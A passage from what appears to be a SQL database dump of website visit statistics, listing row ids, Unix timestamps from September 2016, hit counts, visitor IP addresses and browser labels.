15.149','other'),(60207,1472930829,2,2,0,0,'141.8.183.25','other'),(60208,1472930884,1,1,0,0,'141.8.142.58','other'),(60209,1472931675,1,1,0,0,'94.179.120.21','firefox'),(60210,1472931871,1,1,0,0,'130.193.51.74','other'),(60211,1472933053,1,1,0,0,'66.249.81.205','other'),(60212,1472933815,1,1,0,0,'92.113.126.61','firefox'),(60213,1472934723,1,1,0,0,'92.113.126.61','firefox'),(60214,1472935781,1,1,0,0,'92.113.126.61','firefox'),(60215,1472935994,2,2,0,0,'92.113.126.61','chrome'),(60216,1472936067,1,0,1,0,'68.180.230.222',''),(60217,1472936097,1,0,1,0,'66.249.66.177',''),(60218,1472936597,1,1,0,0,'157.55.39.143','other'),(60219,1472936659,1,1,0,0,'66.249.81.205','other'),(60220,1472936686,1,1,0,0,'37.115.78.187','chrome'),(60221,1472936880,1,1,0,0,'37.55.224.58','firefox'),(60222,1472936974,1,1,0,0,'92.113.126.61','firefox'),(60223,1472937261,2,2,0,0,'130.193.50.34','other'),(60224,1472937899,1,1,0,0,'5.255.250.41','other'),(60225,1472938042,1,1,0,0,'92.113.126.61','firefox'),(60226,1472940257,1,1,0,0,'66.249.81.208','other'),(60227,1472941872,1,1,0,0,'130.193.51.19','other'),(60228,1472943239,2,2,0,0,'130.193.50.34','other'),(60229,1472943518,1,1,0,0,'141.8.183.25','other'),(60230,1472943740,1,1,0,0,'130.193.51.19','other'),(60231,1472943858,1,1,0,0,'66.249.81.205','other'),(60232,1472946931,1,1,0,0,'141.8.142.67','other'),(60233,1472947064,1,1,0,0,'130.193.50.34','other'),(60234,1472947589,1,1,0,0,'66.249.81.208','other'),(60235,1472949557,1,1,0,0,'157.55.39.143','other'),(60236,1472950995,1,1,0,0,'66.249.81.205','other'),(60237,1472952516,1,1,0,0,'173.234.159.250','other'),(60238,1472954141,1,1,0,0,'178.32.127.112','firefox'),(60239,1472955014,1,1,0,0,'66.249.81.208','other'),(60240,1472956462,1,1,0,0,'92.156.250.76','other'),(60241,1472957937,2,0,2,0,'66.249.76.60',''),(60242,1472958195,1,1,0,0,'66.249.81.208','other'),(60243,1472960779,1,1,0,0,'130.193.50.34','other'),(60244,1472961936,1,1,0,0,'66.249.81.208','other'),(60245,1472964747,1,1,0,0,'117.54.244.22','firefox'),(60246,1472965619,1,1,0,0,'66.249.81.205','other'),(60247,1472966315,1,1,0,0,'92.113.126.61','firefox'),(60248,1472967978,3,3,0,0,'91.209.51.22','other'),(60249,1472969249,1,1,0,0,'66.249.81.202','other'),(60250,1472972226,1,1,0,0,'130.193.51.19','other'),(60251,1472972380,1,1,0,0,'176.195.182.251','opera'),(60252,1472972683,1,1,0,0,'66.249.81.208','other'),(60253,1472972868,1,1,0,0,'95.143.30.185','msie'),(60254,1472973529,1,1,0,0,'95.221.249.238','chrome'),(60255,1472974165,1,1,0,0,'176.15.28.246','chrome'),(60256,1472975983,1,0,1,0,'68.180.230.222',''),(60257,1472976211,1,1,0,0,'66.249.81.205','other'),(60258,1472979554,1,1,0,0,'94.179.221.158','chrome'),(60259,1472979570,1,1,0,0,'130.193.51.19','other'),(60260,1472979839,1,1,0,0,'66.249.81.205','other'),(60261,1472980386,1,1,0,0,'178.94.172.118','other'),(60262,1472983268,1,0,1,0,'66.249.76.59',''),(60263,1472983358,1,1,0,0,'94.179.51.68','chrome'),(60264,1472983412,1,1,0,0,'66.249.81.202','other'),(60265,1472985334,15,15,0,0,'51.254.97.192','other'),(60266,1472986527,1,1,0,0,'46.211.115.45','chrome'),(60267,1472986997,1,1,0,0,'66.249.81.205','other'),(60268,1472989996,1,1,0,0,'207.46.13.167','other'),(60269,1472991030,1,1,0,0,'66.249.81.208','other'),(60270,1472991902,1,0,1,0,'66.249.76.59',''),(60271,1472992398,1,1,0,0,'207.46.13.136','other'),(60272,1472994014,1,0,1,0,'66.249.76.61',''),(60273,1472994198,1,1,0,0,'66.249.81.208','other'),(60274,1472994844,1,1,0,0,'66.249.93.28','chrome'),(60275,1472995609,1,0,1,0,'66.249.76.79',''),(60276,1472996165,1,1,0,0,'174.129.237.157','other'),(60277,1472997873,1,1,0,0,'66.249.81.205','other'),(60278,1472998019,1,0,1,0,'66.249.76.59',''),(60279,1472998559,1,1,0,0,'91.196.178.65','chrome'),(60280,1472998856,1,0,1,0,'66.249.76.77',''),(60281,1472998887,1,0,1,0,'66.249.76.60',''),(60282,1473000777,1,0,1,0,'66.249.76.59',''),(60283,1473001133,1,1,0,0,'157.55.39.190','other'),(60284,1473001395,1,1,0,0,'66.249.81.205','other'),(60285,1473002439,1,0,1,0,'66.249.76.79',''),(60286,1473002866,1,0,1,0,'66.249.76.61',''),(60287,1473004428,1,0,1,0,'66.249.76.81',''),(60288,1473005072,1,1,0,0,'66.249.81.202','other'),(60289,1473006537,1,0,1,0,'66.249.76.61',''),(60290,1473006538,1,0,1,0,'66.249.76.79',''),(60291,1473006733,1,1,0,0,'141.8.142.58','other'),(60292,1473007274,3,3,0,0,'162.210.196.130','other'),(60293,1473007494,1,1,0,0,'92.113.126.61','firefox'),(60294,1473008261,1,0,1,0,'66.249.76.59',''),(60295,1473008509,1,0,1,0,'66.249.76.61',''),(60296,1473008725,1,1,0,0,'66.249.81.205','other'),(60297,1473009457,1,0,1,0,'66.249.66.81',''),(60298,1473011172,1,0,1,0,'66.249.76.59',''),(60299,1473012130,1,0,1,0,'66.249.76.60',''),(60300,1473012325,1,1,0,0,'66.249.81.205','other'),(60301,1473012762,1,1,0,0,'51.255.66.125','other'),(60302,1473013375,1,0,1,0,'66.249.76.59',''),(60303,1473014735,1,1,0,0,'207.46.13.136','other'),(60304,1473014952,1,0,1,0,'66.249.76.79',''),(60305,1473015065,1,0,1,0,'66.249.66.81',''),(60306,1473015198,1,0,1,0,'66.249.76.59',''),(60307,1473015795,1,1,0,0,'66.249.81.202','other'),(60308,1473017053,1,1,0,0,'91.196.178.71','chrome'),(60309,1473018002,2,0,2,0,'66.249.76.61',''),(60310,1473018692,1,0,1,0,'66.249.66.81',''),(60311,1473019526,1,1,0,0,'66.249.81.208','other'),(60312,1473023035,1,1,0,0,'66.249.81.208','other'),(60313,1473024102,1,1,0,0,'180.76.15.33','other'),(60314,1473024727,1,0,1,0,'66.249.76.61',''),(60315,1473024985,1,0,1,0,'66.249.76.59',''),(60316,1473026602,1,1,0,0,'66.249.81.208','other'),(60317,1473026695,1,1,0,0,'141.8.183.25','other'),(60318,1473026699,1,1,0,0,'93.158.152.84','other'),(60319,1473026854,1,1,0,0,'207.46.13.167','other'),(60320,1473030194,1,1,0,0,'66.249.81.205','other'),(60321,1473033535,1,1,0,0,'66.249.76.61','chrome'),(60322,1473033553,1,1,0,0,'66.249.66.177','chrome'),(60323,1473033999,1,1,0,0,'66.249.81.205','other'),(60324,1473036926,1,0,1,0,'66.249.76.60',''),(60325,1473037629,1,1,0,0,'66.249.81.205','other'),(60326,1473041016,1,1,0,0,'66.249.81.208','other'),(60327,1473043223,1,1,0,0,'163.172.65.42','other'),(60328,1473044011,1,1,0,0,'51.255.65.51','other'),(60329,1473044703,1,1,0,0,'66.249.81.205','other'),(60330,1473045155,1,1,0,0,'163.172.66.153','other'),(60331,1473046007,1,1,0,0,'163.172.66.13','other'),(60332,1473046380,1,1,0,0,'164.132.161.7','other'),(60333,1473047634,1,1,0,0,'163.172.66.22','other'),(60334,1473048322,1,1,0,0,'66.249.81.208','other'),(60335,1473049206,1,1,0,0,'163.172.64.187','other'),(60336,1473049257,1,1,0,0,'164.132.161.22','other'),(60337,1473049433,1,1,0,0,'163.172.66.156','other'),(60338,1473049981,1,1,0,0,'66.249.76.59','chrome'),(60339,1473050264,1,1,0,0,'164.132.161.53','other'),(60340,1473050387,1,1,0,0,'163.172.64.180','other'),(60341,1473051060,1,0,1,0,'66.249.76.61',''),(60342,1473051062,1,1,0,0,'164.132.161.49','other'),(60343,1473051139,1,1,0,0,'66.249.76.61','chrome'),(60344,1473051329,1,1,0,0,'91.196.178.68','firefox'),(60345,1473051351,1,1,0,0,'163.172.66.174','other'),(60346,1473051977,1,1,0,0,'207.46.13.167','other'),(60347,1473051983,1,1,0,0,'66.249.81.208','other'),(60348,1473052612,1,1,0,0,'164.132.161.74','other'),(60349,1473053289,1,1,0,0,'92.113.126.61','firefox'),(60350,1473054448,1,1,0,0,'163.172.66.28','other'),(60351,1473054588,1,1,0,0,'163.172.65.19','other'),(60352,1473055219,1,1,0,0,'163.172.66.34','other'),(60353,1473055255,1,1,0,0,'51.255.65.95','other'),(60354,1473055262,1,1,0,0,'164.132.161.25','other'),(60355,1473055464,1,1,0,0,'207.46.13.167','other'),(60356,1473055645,1,1,0,0,'92.113.126.61','firefox'),(60357,1473055648,1,1,0,0,'164.132.161.80','other'),(60358,1473055776,1,1,0,0,'163.172.66.73','other'),(60359,1473056246,1,1,0,0,'164.132.161.63','other'),(60360,1473056308,1,0,1,0,'66.249.76.60',''),(60361,1473056517,1,1,0,0,'164.132.161.50','other'),(60362,1473057019,1,1,0,0,'163.172.66.64','other'),(60363,1473057064,1,1,0,0,'163.172.66.62','other'),(60364,1473057514,1,1,0,0,'164.132.161.4','other'),(60365,1473057748,1,1,0,0,'163.172.64.246','other'),(60366,1473058013,1,1,0,0,'82.207.91.234','firefox'),(60367,1473058339,1,1,0,0,'163.172.66.121','other'),(60368,1473058626,1,1,0,0,'51.255.65.84','other'),(60369,1473058771,1,1,0,0,'163.172.66.62','other'),(60370,1473058952,1,1,0,0,'194.44.69.191','chrome'),(60371,1473058985,1,1,0,0,'51.255.65.94','other'),(60372,1473060040,1,1,0,0,'51.255.65.22','other'),(60373,1473060480,1,1,0,0,'5.255.250.41','other'),(60374,1473060532,1,1,0,0,'163.172.66.79','other'),(60375,1473060818,1,1,0,0,'37.55.56.118','firefox'),(60376,1473061082,1,1,0,0,'164.132.161.10','other'),(60377,1473061143,1,1,0,0,'163.172.66.129','other'),(60378,1473062150,1,1,0,0,'163.172.64.251','other'),(60379,1473062208,1,1,0,0,'174.129.237.157','other'),(60380,1473062722,1,1,0,0,'163.172.66.2','other'),(60381,1473063721,1,1,0,0,'51.255.65.25','other'),(60382,1473064551,1,1,0,0,'164.132.161.14','other'),(60383,1473064691,1,1,0,0,'51.255.65.81','other'),(60384,1473064945,1,1,0,0,'91.196.178.67','chrome'),(60385,1473064978,1,1,0,0,'141.8.183.25','other'),(60386,1473065805,1,0,1,0,'66.249.76.79',''),(60387,1473066143,2,2,0,0,'5.9.151.22','other'),(60388,1473066298,1,1,0,0,'163.172.65.58','other'),(60389,1473066501,1,1,0,0,'163.172.66.44','other'),(60390,1473066660,2,2,0,0,'95.135.140.105','firefox'),(60391,1473066797,1,1,0,0,'163.172.64.234','other'),(60392,1473066805,1,1,0,0,'163.172.65.37','other'),(60393,1473066837,1,1,0,0,'163.172.65.235','other'),(60394,1473066973,1,1,0,0,'163.172.65.20','other'),(60395,1473067470,1,1,0,0,'51.255.65.77','other'),(60396,1473067534,1,1,0,0,'163.172.65.194','other'),(60397,1473067677,1,1,0,0,'94.179.17.95','chrome'),(60398,1473067909,1,1,0,0,'91.196.178.68','chrome'),(60399,1473068033,1,1,0,0,'91.196.178.70','firefox'),(60400,1473068053,1,1,0,0,'92.113.126.61','firefox'),(60401,1473068211,1,1,0,0,'163.172.65.38','other'),(60402,1473068280,1,1,0,0,'163.172.66.167','other'),(60403,1473068437,1,1,0,0,'164.132.161.8','other'),(60404,1473068562,1,1,0,0,'51.255.65.4','other'),(60405,1473068680,1,1,0,0,'95.135.140.105','firefox'),(60406,1473069058,1,1,0,0,'51.255.65.85','other'),(60407,1473069495,2,2,0,0,'174.129.237.157','other'),(60408,1473069845,1,1,0,0,'95.135.140.105','firefox'),(60409,1473069854,1,1,0,0,'164.132.161.82','other'),(60410,1473070301,1,1,0,0,'163.172.66.75','other'),(60411,1473070598,1,1,0,0,'163.172.66.125','other'),(60412,1473070818,1,1,0,0,'91.121.181.101','other'),(60413,1473071262,1,1,0,0,'164.132.161.4','other'),(60414,1473071444,1,1,0,0,'141.8.142.58','other'),(60415,1473071457,1,1,0,0,'178.151.34.194','chrome'),(60416,1473071582,1,1,0,0,'178.95.49.238','firefox'),(60417,1473071719,1,1,0,0,'51.255.66.124','other'),(60418,1473072020,1,1,0,0,'51.255.65.22','other'),(60419,1473072034,1,1,0,0,'163.172.66.28','other'),(60420,1473072141,1,1,0,0,'163.172.65.24','other'),(60421,1473072583,1,1,0,0,'163.172.65.121','other'),(60422,1473072700,1,1,0,0,'91.196.178.69','firefox'),(60423,1473073028,1,1,0,0,'109.86.1.65','firefox'),(60424,1473073493,1,1,0,0,'163.172.66.174','other'),(60425,1473073566,1,1,0,0,'91.196.178.68','chrome'),(60426,1473073747,1,1,0,0,'163.172.65.184','other'),(60427,1473074323,1,1,0,0,'185.46.149.162','firefox'),(60428,1473074397,1,1,0,0,'163.172.64.222','other'),(60429,1473074408,1,1,0,0,'207.46.13.177','other'),(60430,1473074707,1,1,0,0,'185.26.180.210','opera'),(60431,1473074959,1,1,0,0,'116.75.142.103','firefox'),(60432,1473075027,1,1,0,0,'91.196.178.68','firefox'),(60433,1473075713,1,1,0,0,'163.172.65.112','other'),(60434,1473076008,2,2,0,0,'5.9.87.111','other'),(60435,1473076017,1,1,0,0,'51.255.65.89','other'),(60436,1473076102,1,1,0,0,'91.196.178.65','chrome'),(60437,1473076204,1,1,0,0,'207.46.13.177','other'),(60438,1473077332,1,1,0,0,'180.76.15.145','other'),(60439,1473077896,1,0,1,0,'66.249.76.60',''),(60440,1473078094,1,1,0,0,'164.132.161.15','other'),(60441,1473078306,1,1,0,0,'164.132.161.33','other'),(60442,1473078644,1,1,0,0,'163.172.64.254','other'),(60443,1473079145,1,0,1,0,'66.249.76.77',''),(60444,1473079249,1,1,0,0,'91.196.178.129','firefox'),(60445,1473079625,1,1,0,0,'164.132.161.33','other'),(60446,1473079842,1,0,1,0,'66.249.76.60',''),(60447,1473079851,1,0,1,0,'66.249.76.79',''),(60448,1473079886,1,0,1,0,'66.249.66.84',''),(60449,1473080226,1,1,0,0,'157.55.39.190','other'),(60450,1473080798,1,1,0,0,'91.196.178.66','firefox'),(60451,1473081057,1,1,0,0,'91.196.122.186','chrome'),(60452,1473081066,1,1,0,0,'178.94.62.176','chrome'),(60453,1473081078,1,1,0,0,'141.8.142.61','other'),(60454,1473081269,1,1,0,0,'163.172.65.197','other'),(60455,1473082665,1,1,0,0,'163.172.65.196','other'),(60456,1473082702,1,1,0,0,'51.255.65.18','other'),(60457,1473082910,1,1,0,0,'163.172.66.23','other'),(60458,1473083030,1,1,0,0,'51.255.65.8','other'),(60459,1473083224,1,1,0,0,'163.172.64.234','other'),(60460,1473083252,1,1,0,0,'164.132.161.72','other'),(60461,1473083333,1,1,0,0,'91.196.178.66','firefox'),(60462,1473083512,1,1,0,0,'163.172.66.163','other'),(60463,1473083847,1,1,0,0,'163.172.64.220','other'),(60464,1473083963,1,1,0,0,'51.255.65.45','other'),(60465,1473084307,1,1,0,0,'178.151.34.194','chrome'),(60466,1473084555,1,1,0,0,'163.172.66.47','other'),(60467,1473084663,1,1,0,0,'178.92.249.35','opera'),(60468,1473084744,1,1,0,0,'163.172.66.14','other'),(60469,1473085979,1,1,0,0,'51.255.65.23','other'),(60470,1473086303,1,1,0,0,'176.104.1.114','chrome'),(60471,1473086622,1,1,0,0,'163.172.64.245','other'),(60472,1473086654,1,1,0,0,'51.255.65.89','other'),(60473,1473086894,1,1,0,0,'164.132.161.43','other'),(60474,1473086981,1,1,0,0,'163.172.66.63','other'),(60475,1473087066,1,1,0,0,'163.172.66.175','other'),(60476,1473087135,1,1,0,0,'51.255.65.74','other'),(60477,1473087160,1,1,0,0,'163.172.65.57','other'),(60478,1473087199,1,1,0,0,'164.132.161.22','other'),(60479,1473087682,1,1,0,0,'163.172.64.177','other'),(60480,1473087939,1,1,0,0,'91.196.178.101','firefox'),(60481,1473088248,1,1,0,0,'164.132.161.46','other'),(60482,1473088836,1,1,0,0,'51.255.65.54','other'),(60483,1473088979,1,1,0,0,'164.132.161.26','other'),(60484,1473089226,1,1,0,0,'163.172.66.72','other'),(60485,1473089347,1,1,0,0,'163.172.65.250','other'),(60486,1473089740,1,1,0,0,'163.172.65.15','other'),(60487,1473090129,1,1,0,0,'163.172.66.55','other'),(60488,1473090394,1,1,0,0,'130.193.50.34','other'),(60489,1473090530,1,0,1,0,'66.249.76.59',''),(60490,1473090766,1,1,0,0,'141.8.142.62','other'),(60491,1473090858,1,1,0,0,'180.76.15.34','other'),(60492,1473091020,1,1,0,0,'207.46.13.177','other'),(60493,1473091219,1,1,0,0,'92.113.126.61','firefox'),(60494,1473091590,1,1,0,0,'51.255.65.36','other'),(60495,1473092468,1,1,0,0,'164.132.161.80','other'),(60496,1473092814,1,1,0,0,'163.172.66.112','other'),(60497,1473092991,1,1,0,0,'207.46.13.136','other'),(60498,1473093607,1,1,0,0,'164.132.161.13','other'),(60499,1473093737,2,0,2,0,'66.249.76.59',''),(60500,1473093770,1,1,0,0,'164.132.161.15','other'),(60501,1473093773,1,0,1,0,'66.249.76.81',''),(60502,1473093805,1,1,0,0,'163.172.65.108','other'),(60503,1473094026,1,1,0,0,'163.172.64.233','other'),(60504,1473094241,1,0,1,0,'66.249.66.81',''),(60505,1473094599,1,1,0,0,'51.255.65.37','other'),(60506,1473094612,1,1,0,0,'163.172.65.226','other'),(60507,1473094704,1,1,0,0,'163.172.66.115','other'),(60508,1473094979,1,1,0,0,'51.255.65.24','other'),(60509,1473096177,1,1,0,0,'51.255.65.88','other'),(60510,1473096305,1,0,1,0,'66.249.76.60',''),(60511,1473096700,1,1,0,0,'51.255.65.84','other'),(60512,1473097241,1,1,0,0,'164.132.161.4','other'),(60513,1473097383,1,0,1,0,'66.249.76.81',''),(60514,1473097951,1,1,0,0,'51.255.65.12','other'),(60515,1473098029,1,1,0,0,'51.255.65.38','other'),(60516,1473098052,1,1,0,0,'163.172.66.10','other'),(60517,1473098820,1,1,0,0,'46.211.70.4','chrome'),(60518,1473099329,1,1,0,0,'163.172.64.199','other'),(60519,1473099528,1,1,0,0,'163.172.64.235','other'),(60520,1473100176,1,1,0,0,'51.255.65.10','other'),(60521,1473100763,1,1,0,0,'51.255.65.14','other'),(60522,1473100768,1,1,0,0,'91.196.178.68','firefox'),(60523,1473101042,1,0,1,0,'66.249.76.61',''),(60524,1473101206,1,1,0,0,'91.196.178.70','chrome'),(60525,1473101376,1,0,1,0,'66.249.76.59',''),(60526,1473102100,1,1,0,0,'163.172.65.31','other'),(60527,1473102209,1,1,0,0,'164.132.161.84','other'),(60528,1473102395,1,1,0,0,'163.172.66.41','other'),(60529,1473102965,1,1,0,0,'163.172.66.153','other'),(60530,1473103030,1,1,0,0,'51.255.65.46','other'),(60531,1473103330,1,1,0,0,'51.255.65.79','other'),(60532,1473103428,1,1,0,0,'164.132.161.30','other'),(60533,1473103790,1,1,0,0,'163.172.66.82','other'),(60534,1473104800,1,1,0,0,'92.113.126.61','firefox'),(60535,1473110969,1,0,1,0,'66.249.76.59',''),(60536,1473111972,1,0,1,0,'66.249.76.59',''),(60537,1473112968,2,0,2,0,'66.249.76.61',''),(60538,1473113004,2,0,2,0,'66.249.76.60',''),(60539,1473113124,1,1,0,0,'164.132.161.45','other'),(60540,1473113220,1,1,0,0,'163.172.66.133','other'),(60541,1473113292,1,1,0,0,'207.46.13.177','other'),(60542,1473113346,1,1,0,0,'163.172.65.242','other'),(60543,1473113566,1,1,0,0,'163.172.65.221','other'),(60544,1473114120,1,0,1,0,'66.249.66.81',''),(60545,1473114350,1,1,0,0,'207.46.13.136','other'),(60546,1473114826,1,1,0,0,'164.132.161.23','other'),(60547,1473115165,1,1,0,0,'163.172.66.101','other'),(60548,1473115334,1,1,0,0,'130.193.50.34','other'),(60549,1473115983,4,4,0,0,'69.30.205.218','other'),(60550,1473115988,1,1,0,0,'163.172.65.120','other'),(60551,1473116683,1,0,1,0,'66.249.76.60',''),(60552,1473117717,1,1,0,0,'144.76.12.78','other'),(60553,1473118605,1,1,0,0,'163.172.66.58','other'),(60554,1473118623,1,0,1,0,'66.249.66.87',''),(60555,1473118994,1,1,0,0,'163.172.66.24','other'),(60556,1473119151,1,1,0,0,'163.172.64.216','other'),(60557,1473119370,1,1,0,0,'163.172.65.192','other'),(60558,1473119996,1,1,0,0,'163.172.66.184','other'),(60559,1473120799,1,0,1,0,'66.249.76.61',''),(60560,1473120947,1,1,0,0,'163.172.65.8','other'),(60561,1473121581,1,1,0,0,'207.46.13.136','other'),(60562,1473122521,1,1,0,0,'164.132.161.42','other'),(60563,1473122622,1,1,0,0,'164.132.161.87','other'),(60564,1473124306,2,2,0,0,'174.129.237.157','other'),(60565,1473125233,7,7,0,0,'5.9.88.103','other'),(60566,1473126223,1,1,0,0,'174.129.237.157','other'),(60567,1473127914,1,1,0,0,'130.193.51.19','other'),(60568,1473128969,1,1,0,0,'163.172.66.10','other'),(60569,1473129026,1,1,0,0,'51.255.65.23','other'),(60570,1473129103,1,1,0,0,'174.129.237.157','other'),(60571,1473129299,62,62,0,0,'144.76.29.66','other'),(60572,1473129689,1,1,0,0,'51.255.65.67','other'),(60573,1473129721,1,1,0,0,'207.46.13.55','other'),(60574,1473129995,1,1,0,0,'130.193.50.34','other'),(60575,1473130288,1,1,0,0,'163.172.65.37','other'),(60576,1473130327,1,1,0,0,'163.172.66.130','other'),(60577,1473130491,1,1,0,0,'163.172.64.226','other'),(60578,1473130803,1,1,0,0,'163.172.66.125','other'),(60579,1473131336,1,1,0,0,'163.172.66.50','other'),(60580,1473131528,1,1,0,0,'51.255.65.49','other'),(60581,1473131924,1,0,1,0,'66.249.76.60',''),(60582,1473131986,1,1,0,0,'163.172.64.228','other'),(60583,1473133050,1,1,0,0,'163.172.65.180','other'),(60584,1473133111,1,1,0,0,'164.132.161.97','other'),(60585,1473133231,1,1,0,0,'180.76.15.10','other'),(60586,1473133692,1,1,0,0,'163.172.66.114','other'),(60587,1473133722,1,1,0,0,'163.172.66.112','other'),(60588,1473133949,1,1,0,0,'92.113.126.61','firefox'),(60589,1473134198,1,1,0,0,'164.132.161.7','other'),(60590,1473134303,1,1,0,0,'51.255.65.62','other'),(60591,1473135031,1,1,0,0,'180.76.15.19','other'),(60592,1473135252,1,1,0,0,'51.255.65.54','other'),(60593,1473135373,1,1,0,0,'163.172.66.93','other'),(60594,1473135392,36,36,0,0,'176.9.10.227','other'),(60595,1473135700,1,1,0,0,'91.196.178.38','chrome'),(60596,1473135704,1,1,0,0,'31.13.102.101','other'),(60597,1473137639,1,1,0,0,'130.193.50.34','other'),(60598,1473137976,1,1,0,0,'51.255.65.39','other'),(60599,1473138073,1,1,0,0,'51.255.65.94','other'),(60600,1473138231,1,1,0,0,'77.222.140.6','firefox'),(60601,1473138495,1,1,0,0,'164.132.161.12','other'),(60602,1473138638,1,1,0,0,'51.255.65.51','other'),(60603,1473138772,1,1,0,0,'163.172.66.85','other'),(60604,1473138861,1,0,1,0,'66.249.76.77',''),(60605,1473138909,1,1,0,0,'51.255.65.60','other'),(60606,1473139111,1,1,0,0,'164.132.161.57','other'),(60607,1473139205,1,1,0,0,'95.24.120.24','msie'),(60608,1473139637,1,1,0,0,'51.255.65.79','other'),(60609,1473140041,1,1,0,0,'94.179.0.63','firefox'),(60610,1473140191,1,1,0,0,'163.172.66.111','other'),(60611,1473140403,1,0,1,0,'66.249.76.61',''),(60612,1473140422,1,0,1,0,'68.180.230.178',''),(60613,1473140651,1,1,0,0,'163.172.66.103','other'),(60614,1473140916,1,1,0,0,'180.76.15.151','other'),(60615,1473141114,1,1,0,0,'163.172.66.163','other'),(60616,1473141399,1,1,0,0,'207.46.13.136','other'),(60617,1473141829,1,1,0,0,'91.196.178.65','chrome'),(60618,1473142236,1,1,0,0,'51.255.194.31','other'),(60619,1473142501,1,1,0,0,'130.193.50.34','other'),(60620,1473142611,1,0,1,0,'66.249.76.61',''),(60621,1473142659,1,1,0,0,'66.249.93.29','chrome'),(60622,1473142722,1,1,0,0,'141.8.142.61','other'),(60623,1473143571,1,1,0,0,'51.255.65.29','other'),(60624,1473143688,1,0,1,0,'66.249.76.61',''),(60625,1473143785,1,0,1,0,'66.249.76.60',''),(60626,1473144120,1,1,0,0,'163.172.65.30','other'),(60627,1473144532,1,0,1,0,'66.249.76.59',''),(60628,1473145417,1,1,0,0,'164.132.161.80','other'),(60629,1473145635,1,1,0,0,'163.172.65.116','other'),(60630,1473145730,2,0,2,0,'66.249.66.87',''),(60631,1473145806,1,1,0,0,'95.221.202.205','msie'),(60632,1473146535,1,1,0,0,'164.132.161.91','other'),(60633,1473146679,1,1,0,0,'91.196.178.136','firefox'),(60634,1473146780,1,1,0,0,'46.200.122.235','firefox'),(60635,1473147174,1,1,0,0,'163.172.64.244','other'),(60636,1473147328,1,0,1,0,'66.249.76.59',''),(60637,1473147335,1,1,0,0,'163.172.65.18','other'),(60638,1473147398,1,1,0,0,'91.196.178.166','chrome'),(60639,1473147525,1,1,0,0,'163.172.66.16','other'),(60640,1473147707,1,1,0,0,'176.193.139.121','msie'),(60641,1473148145,1,1,0,0,'163.172.65.210','other'),(60642,1473148422,1,1,0,0,'130.193.51.79','other'),(60643,1473149002,1,0,1,0,'66.249.76.61',''),(60644,1473149013,1,1,0,0,'130.193.50.34','other'),(60645,1473149014,1,1,0,0,'93.158.152.84','other'),(60646,1473149720,1,1,0,0,'178.92.209.90','chrome'),(60647,1473149737,1,1,0,0,'141.8.183.25','other'),(60648,1473149795,1,1,0,0,'163.172.64.244','other'),(60649,1473150341,1,1,0,0,'163.172.66.40','other'),(60650,1473150515,1,1,0,0,'91.124.110.210','chrome'),(60651,1473150638,1,1,0,0,'163.172.64.185','other'),(60652,1473150936,1,1,0,0,'163.172.66.36','other'),(60653,1473150968,1,1,0,0,'37.53.145.79','firefox'),(60654,1473150982,1,1,0,0,'141.8.183.25','other'),(60655,1473151387,1,1,0,0,'51.255.65.6','other'),(60656,1473152998,1,0,1,0,'66.249.76.61',''),(60657,1473153373,1,1,0,0,'92.113.126.61','firefox'),(60658,1473154487,1,1,0,0,'93.73.234.193','firefox'),(60659,1473155256,1,1,0,0,'163.172.66.9','other'),(60660,1473155805,1,1,0,0,'163.172.65.54','other'),(60661,1473156300,1,1,0,0,'164.132.161.6','other'),(60662,1473156475,1,1,0,0,'164.132.161.41','other'),(60663,1473156764,1,0,1,0,'66.249.76.61',''),(60664,1473156987,1,1,0,0,'164.132.161.58','other'),(60665,1473157223,1,1,0,0,'207.46.13.136','other'),(60666,1473157752,1,1,0,0,'163.172.66.73','other'),(60667,1473158314,2,0,2,0,'66.249.76.59',''),(60668,1473158720,4,4,0,0,'5.9.62.130','other'),(60669,1473159099,1,1,0,0,'164.132.161.23','other'),(60670,1473159556,1,1,0,0,'163.172.66.58','other'),(60671,1473159921,1,1,0,0,'66.249.93.29','other'),(60672,1473159936,1,1,0,0,'91.196.178.68','msie'),(60673,1473160550,1,1,0,0,'194.31.46.63','chrome'),(60674,1473160658,1,1,0,0,'163.172.66.109','other'),(60675,1473160850,1,1,0,0,'51.255.65.13','other'),(60676,1473160887,1,1,0,0,'163.172.64.253','other'),(60677,1473160898,1,1,0,0,'163.172.64.249','other'),(60678,1473161013,1,1,0,0,'94.179.86.48','chrome'),(60679,1473161116,1,0,1,0,'66.249.76.60',''),(60680,1473161147,1,1,0,0,'95.158.63.131','chrome'),(60681,1473161287,1,0,1,0,'66.249.76.59',''),(60682,1473161615,1,1,0,0,'207.46.13.177','other'),(60683,1473161629,1,1,0,0,'164.132.161.11','other'),(60684,1473161647,1,1,0,0,'163.172.64.217','other'),(60685,1473161701,1,1,0,0,'163.172.66.140','other'),(60686,1473162655,1,1,0,0,'46.164.168.247','chrome'),(60687,1473163000,1,1,0,0,'95.134.176.197','chrome'),(60688,1473163481,1,1,0,0,'163.172.65.230','other'),(60689,1473163600,1,1,0,0,'94.45.58.194','chrome'),(60690,1473163664,1,1,0,0,'78.111.177.233','chrome'),(60691,1473163870,1,1,0,0,'91.196.178.162','chrome'),(60692,1473163935,1,1,0,0,'91.124.59.206','chrome'),(60693,1473164080,1,1,0,0,'66.249.93.28','other'),(60694,1473164386,1,1,0,0,'178.92.209.90','chrome'),(60695,1473164621,1,1,0,0,'130.193.50.34','other'),(60696,1473164694,1,1,0,0,'164.132.161.91','other'),(60697,1473164738,1,0,1,0,'66.249.76.60',''),(60698,1473165057,1,1,0,0,'163.172.66.140','other'),(60699,1473165145,1,1,0,0,'94.179.26.209','firefox'),(60700,1473165181,1,1,0,0,'163.172.64.226','other'),(60701,1473165866,1,1,0,0,'95.134.176.197','chrome'),(60702,1473166222,1,1,0,0,'157.55.39.190','other'),(60703,1473166870,2,2,0,0,'141.8.142.58','other'),(60704,1473167135,1,1,0,0,'66.249.93.29','other'),(60705,1473167617,1,1,0,0,'51.255.65.23','other'),(60706,1473168400,1,1,0,0,'95.132.25.134','chrome'),(60707,1473168575,1,1,0,0,'95.135.210.2','chrome'),(60708,1473168825,1,0,1,0,'66.249.66.177',''),(60709,1473169541,1,1,0,0,'5.255.250.41','other'),(60710,1473169755,4,4,0,0,'5.9.89.170','other'),(60711,1473170675,1,1,0,0,'164.132.161.74','other'),(60712,1473170768,1,1,0,0,'66.249.93.29','other'),(60713,1473170787,1,1,0,0,'91.196.178.65','firefox'),(60714,1473171390,1,1,0,0,'51.255.65.26','other'),(60715,1473171480,1,1,0,0,'164.132.161.64','other'),(60716,1473171660,1,1,0,0,'164.132.161.87','other'),(60717,1473171806,1,1,0,0,'163.172.66.163','other'),(60718,1473171819,1,1,0,0,'163.172.64.193','other'),(60719,1473172604,1,1,0,0,'66.249.76.61','chrome'